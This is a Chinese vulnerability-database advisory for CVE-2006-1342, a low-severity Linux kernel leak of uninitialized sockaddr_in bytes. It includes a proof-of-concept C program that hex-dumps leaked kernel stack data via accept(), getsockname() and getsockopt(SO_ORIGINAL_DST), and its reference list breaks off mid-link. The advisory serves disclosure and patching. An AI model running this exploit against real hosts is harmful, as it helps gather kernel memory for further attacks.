Linux 核心Ssockaddr_In.Sin_Zero Kernel内存泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109943 漏洞类型 设计错误
发布时间 2006-03-23 更新时间 2006-03-23
CVE编号 CVE-2006-1342 CNNVD-ID CNNVD-200603-363
漏洞平台 Linux CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/27461
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200603-363
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernel在执行某些套接字函数时存在漏洞,可能导致泄露内核内存的某些数据。LinuxKernel在调用某些套接字函数检索指定的套接字时,没有清零sockaddr_in.sin_zero数组便返回给用户空间程序。攻击者可以以SO_ORIGINAL_DST"选项调用getsockopt()函数,或调用getsockname()、getpeername和accept()函数,泄漏Kernel栈中6个未初始化的字节。注意:getsockname()、getpeername()和accept()函数中的漏洞仅影响2.4kernel。
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/17203/info

The Linux kernel is affected by local memory-disclosure vulnerabilities. These issues are due to the kernel's failure to properly clear previously used kernel memory before returning it to local users.

These issues allow an attacker to read kernel memory and potentially gather information to use in further attacks.
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <linux/netfilter_ipv4.h>

void
dump(const unsigned char *p, unsigned l)
{
  printf("data:");
  while (l > 0) {
    printf(" %02x", *p);
    ++p; --l;
  }
  printf("\n");
}

int
main(int argc, char **argv)
{
  int port;
  int ls, as, r, one;
  struct sockaddr_in sa;
  socklen_t sl;

  if (argc != 2 || (port = atoi(argv[1])) == 0) {
    fprintf(stderr, "usage: bug PORT\n");
    return (1);
  }

  ls = socket(PF_INET, SOCK_STREAM, 0);
  if (ls == -1) {
    perror("ls = socket");
    return (1);
  }
  one = 1;
  r = setsockopt(ls, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
  if (r == -1) {
    perror("setsockopt(ls)");
    return (1);
  }
  sa.sin_family = PF_INET;
  sa.sin_addr.s_addr = INADDR_ANY;
  sa.sin_port = htons(port);
  r = bind(ls, (struct sockaddr *) &sa, sizeof(sa));
  if (r == -1) {
    perror("bind(ls)");
    return (1);
  }
  r = listen(ls, 1);
  if (r == -1) {
    perror("listen(ls)");
    return (1);
  }

  sl = sizeof(sa);
  as = accept(ls, (struct sockaddr *) &sa, &sl);
  if (as == -1) {
    perror("accept(ls)");
    return (1);
  }
  dump((unsigned char *) &sa, sizeof(sa));

  sl = sizeof(sa);
  r = getsockname(as, (struct sockaddr *) &sa, &sl);
  if (r == -1) {
    perror("getsockname(as)");
    return (1);
  }
  dump((unsigned char *) &sa, sizeof(sa));

  sl = sizeof(sa);
  r = getsockopt(as, SOL_IP, SO_ORIGINAL_DST, (struct sockaddr *) &sa, &sl);
  if (r == -1) {
    perror("getsockname(as)");
    return (1);
  }
  dump((unsigned char *) &sa, sizeof(sa));

  return (0);
}
|参考资料

来源:www.kernel.org
链接:http://www.kernel.org/git/?p=linux/kernel/git/marcelo/linux-2.4.git;a=commit;h=09d3b3dcfa80c9094f1748c1be064b9326c9ef2b
来源:MLIST
名称:[linux-netdev]20060304BUG:SmallinformationleakinSO_ORIGINAL_DST(2.4and2.6)and
链接:http://marc.theaimsgroup.com/?l=linux-netdev&m=114148078223594&w=2
来源:www.vmware.com
链接:http://www.vmware.com/download/esx/esx-254-200610-patch.html
来源:www.vmware.com
链接:http://www.vmware.com/download/esx/esx-213-200610-patch.html
来源:www.vmware.com
链接:http://www.vmware.com/download/esx/esx-202-200610-patch.html
来源:BID
名称:17203
链接:http://www.securityfocus.com/bid/17203
来源:BUGTRAQ
名称:20061113VMSA-2006-0008-VMwareESXServer2.0.2UpgradePatch2
链接:http://www.securityfocus.com/archive/1/archive/1/451426/100/200/threaded
来源:BUGTRAQ
名称:20061113VMSA-2006-0005-VMwareESXServer2.5.4UpgradePatch1
链接:http://www.securityfocus.com/archive/1/archive/1/451419/100/200/threaded
来源:BUGTRAQ
名称:20061113VMSA-2006-0007-VMwareESXServer2.1.3UpgradePatch2
链接:http://www.securityfocus.c